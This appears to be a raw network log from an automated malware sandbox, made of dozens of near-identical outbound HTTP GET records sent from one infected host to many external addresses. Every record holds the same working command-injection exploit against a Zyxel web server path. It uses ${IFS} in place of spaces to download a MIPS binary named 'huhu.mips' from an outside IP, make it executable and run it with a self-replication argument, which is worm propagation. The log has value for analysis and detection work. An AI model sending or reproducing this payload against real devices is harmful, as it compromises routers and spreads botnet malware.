                                            Feb 2, 2024 06:21:07.526012897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3045192.168.2.154694472.237.205.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526036024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3046192.168.2.1546330187.111.136.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526082039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3047192.168.2.1558470193.118.5.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526106119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3048192.168.2.15349821.50.47.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526141882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3049192.168.2.1540846139.141.78.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526187897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3050192.168.2.1535718197.249.101.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526217937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3051192.168.2.1548764160.205.246.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526248932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3052192.168.2.1554724106.135.204.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526290894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3053192.168.2.153916277.154.186.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526329994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3054192.168.2.154594662.188.132.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526377916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3055192.168.2.1553930198.15.37.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526411057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3056192.168.2.153501812.150.19.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526432991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3057192.168.2.1540836180.237.47.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526463032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3058192.168.2.1549842102.14.9.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526495934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3059192.168.2.1546244174.231.161.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526559114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3060192.168.2.1551814119.65.192.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526593924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3061192.168.2.1538830114.142.160.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526658058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3062192.168.2.154288632.15.124.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526704073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3063192.168.2.1540838121.238.82.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526706934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3064192.168.2.1551476132.205.212.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526758909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3065192.168.2.155556274.89.228.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526787996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3066192.168.2.155445036.219.37.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526833057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3067192.168.2.153754059.52.62.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526886940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3068192.168.2.1544326210.9.30.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526906967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3069192.168.2.154918495.192.87.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526945114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3070192.168.2.153695476.218.30.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.526997089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3071192.168.2.1543768190.109.119.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527044058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3072192.168.2.154103027.230.186.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527086020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3073192.168.2.153415037.208.134.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527112961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3074192.168.2.154444289.191.181.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527147055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3075192.168.2.1540528220.5.194.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527199984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3076192.168.2.155801823.99.189.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527242899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3077192.168.2.1553698194.121.211.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527275085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3078192.168.2.155429296.29.192.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527333975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3079192.168.2.1548902102.49.119.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527354956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3080192.168.2.1551064186.221.9.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527386904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3081192.168.2.155907642.133.208.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527432919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3082192.168.2.1539688156.134.188.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527452946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3083192.168.2.1549302100.214.158.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527487993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3084192.168.2.155397625.89.251.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527549982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3085192.168.2.1539190107.252.106.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527586937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3086192.168.2.1535286158.172.85.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527645111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3087192.168.2.1536036114.173.113.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527682066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3088192.168.2.154345075.208.3.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527698040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3089192.168.2.154213818.99.75.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527743101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3090192.168.2.1555768202.29.205.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527789116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3091192.168.2.1545764165.28.43.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527822018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3092192.168.2.1553818130.87.125.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527874947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3093192.168.2.1536526112.104.124.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527908087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3094192.168.2.1537514123.40.218.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.527960062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3095192.168.2.154974274.170.213.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528012037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3096192.168.2.153298275.208.104.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528032064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3097192.168.2.1540608114.254.84.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528085947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3098192.168.2.155768843.243.117.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528124094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3099192.168.2.154956271.185.186.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528166056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3100192.168.2.1553474193.151.231.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528206110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3101192.168.2.154571699.251.209.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528238058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3102192.168.2.154247681.247.195.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528275967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3103192.168.2.1549090139.212.172.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528299093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3104192.168.2.1555024178.184.47.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528354883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3105192.168.2.154723069.128.150.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528388977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3106192.168.2.155957619.8.161.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528409004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3107192.168.2.1552424125.19.233.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528470993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3108192.168.2.155956094.103.218.197443
                                            TimestampBytes transferredDirectionData
